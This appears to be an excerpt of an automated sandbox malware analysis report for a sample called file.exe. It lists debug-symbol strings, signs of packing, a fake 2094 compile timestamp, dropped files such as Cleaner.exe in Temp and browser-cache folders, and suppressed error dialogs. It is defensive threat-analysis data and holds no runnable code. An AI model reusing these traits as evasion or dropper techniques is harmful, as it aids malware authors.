                  Source: Binary string: cfgmgr32.pdbo source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: bcrypt.pdbT source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: rasman.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: fltLib.pdbi source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620894635.000001E431143000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscoree.pdb0 source: WerFault.exe, 00000020.00000003.602098493.000001E430647000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.600066159.000001E430647000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Accessibility.ni.pdbr source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: msctf.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: version.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdb source: WerFault.exe, 00000020.00000003.620621756.000001E431144000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620919368.000001E431146000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscoree.pdb8 source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.pdb source: WerFault.exe, 00000020.00000003.620894635.000001E431143000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb%r source: Cleaner.exe, 00000018.00000000.578942897.00000143737A7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: user32.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: diasymreader.pdbC source: WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ws2_32.pdb- source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 00000020.00000003.621032216.000001E43112E000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620701035.000001E43112D000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: psapi.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: rtutils.pdbo source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.pdbt source: WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: msctf.pdb( source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscoreei.pdb source: WerFault.exe, 00000020.00000003.601486906.000001E43067A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.600318897.000001E43067A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.pdbo source: WerFault.exe, 00000020.00000003.620701035.000001E43112D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdb source: WerFault.exe, 00000020.00000003.620436247.000001E431116000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620402333.000001E431112000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.605731171.000001E430641000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb source: WerFault.exe, 00000020.00000003.620621756.000001E431144000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620919368.000001E431146000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: [C:\zakalajoviziw83\mali-xaduvovije95\bahowe\51\xayiziket\fov.pdbPXC-@ source: file.exe, 00000000.00000000.378733488.0000000000401000.00000020.00000001.01000000.00000003.sdmp
                  Source: Binary string: System.Core.pdbb source: WerFault.exe, 00000020.00000003.620621756.000001E431144000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: diasymreader.pdb0 source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\zakalajoviziw83\mali-xaduvovije95\bahowe\51\xayiziket\fov.pdb source: file.exe, 00000000.00000000.378733488.0000000000401000.00000020.00000001.01000000.00000003.sdmp
                  Source: Binary string: comctl32.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdb source: WerFault.exe, 00000020.00000003.600768010.000001E4306F9000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620894635.000001E431143000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: IconCodecService.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Cleaner.exe.0.drStatic PE information: 0xEAE49AF1 [Wed Nov 17 16:40:17 2094 UTC]
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.920922021912582
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.920922021912582
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\dll[1]Jump to dropped file
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\soft[1]Jump to dropped file
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\soft[1]Jump to dropped file
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Bunifu_UI_v1.5.3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\dll[1]Jump to dropped file
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeJump to dropped file
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
